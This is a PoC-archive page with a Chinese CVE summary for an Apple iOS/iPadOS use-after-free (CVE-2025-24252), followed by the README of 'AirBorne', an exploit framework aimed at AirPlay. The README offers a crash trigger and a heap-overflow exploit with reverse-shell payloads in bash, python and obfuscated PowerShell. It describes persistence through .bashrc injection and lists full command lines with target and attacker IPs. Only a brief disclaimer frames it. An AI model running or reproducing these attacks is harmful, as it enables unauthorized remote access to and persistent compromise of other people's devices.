关联漏洞
标题:
Apple iOS和Apple iPadOS 安全漏洞
(CVE-2025-24252)
描述:Apple iOS和Apple iPadOS都是美国苹果(Apple)公司的产品。Apple iOS是一套为移动设备所开发的操作系统。Apple iPadOS是一套用于iPad平板电脑的操作系统。 Apple iOS 18.4之前版本和Apple iPadOS 18.4之前版本存在安全漏洞,该漏洞源于内存管理不当导致的释放后重用问题,可能破坏进程内存。
描述
poc for CVE-2025-24252 & CVE-2025-24132
介绍
# AirBorne PoC Framework – Elite RCE Edition
> **Full PoC Framework for CVE-2025-24252 & CVE-2025-24132**
> By [ekomsSavior](https://github.com/ekomsSavior) |
AirBorne is a combined proof-of-concept (PoC) framework targeting two serious vulnerabilities in Apple's AirPlay service. It includes a full crash trigger and a working reverse shell exploit with optional persistence, listener, and multiple payload formats — all in one script.
> 💾 **Looking for the original version?**
> The legacy edition is still available in the `legacy` branch of this repository.
> To check it out:
```bash
git checkout legacy
```
---
## CVEs Covered
### ✅ CVE-2025-24252 – mDNS TXT Record Crash
- Triggers a crash in the AirPlayReceiver daemon via a malformed mDNS packet
- Works over UDP broadcast on port 5353
### ✅ CVE-2025-24132 – Heap Overflow → Reverse Shell (RCE)
- Triggers a heap overflow in AirPlay's TCP service on port 7000
- Supports bash, python, and PowerShell reverse shell payloads
- Includes optional persistence using `.bashrc` injection (Linux)
---
## Getting Started
### 1. Clone the Repo
```bash
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
```
### 2. Install Dependencies
```bash
sudo apt update
sudo apt install -y python3-scapy netcat
```
---
## Runtime Walkthrough
The single script `airborne.py` includes both PoCs and all logic:
* Select a CVE using `--exploit`
* Set a reverse shell payload using `--payload`
* Auto-starts a netcat listener for you
* Optionally enables persistence on target using `--persistent`
---
## Usage Examples
### Crash Target with mDNS Packet (CVE-2025-24252)
```bash
sudo python3 airborne.py --exploit 24252 --interface wlan0
```
> Requires an interface in monitor mode.
---
### Launch Heap Overflow → RCE (CVE-2025-24132)
Start full exploit with default bash shell:
```bash
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
```
Choose Python shell instead:
```bash
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
```
Enable real persistence on Linux targets:
```bash
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
```
Only shell command einjection
```bash
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
```
---
## Payload Options
| Payload | Description |
| ------------ | --------------------------------------------------- |
| `bash` | Default bash reverse shell over TCP |
| `python` | Python-based reverse shell using `socket` and `pty` |
| `powershell` | Full Windows PowerShell RCE payload (obfuscated) |
---
## Persistence Mode
When using `--persistent`, the script will append the encoded reverse shell payload to the target’s:
```bash
~/.bashrc
```
This ensures a shell is returned to you each time the user logs in or a terminal is spawned.
---
## Maintenance Notes
* Reverse shells are encoded using `base64` and delivered after buffer overflow
* All payloads are sent via port 7000
* mDNS packets go over UDP 5353 and require raw socket permission
* Make sure your attack box IP is reachable by the target device
* Script handles basic error cases and fails silently if closed ports
---
## Ethical Disclaimer
**This project is intended for educational, ethical, and authorized research only.**
* You must have explicit permission to test the target system.
* You assume full responsibility for any actions taken.
Unauthorized exploitation of systems is illegal and unethical.
---
## Credits
* Built by [ekomsSavior](https://github.com/ekomsSavior)
* Inspired by real-world CVEs and exploit development research
文件快照
[4.0K] /data/pocs/86123e6c43ea15f615f0fac28a00a82b518090ad
├── [2.9K] airborne_bash_command_injector.py
├── [5.5K] airborne.py
├── [1.0K] LICENSE
├── [3.8K] README.md
└── [2.6K] wireshark_data.pcapng
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。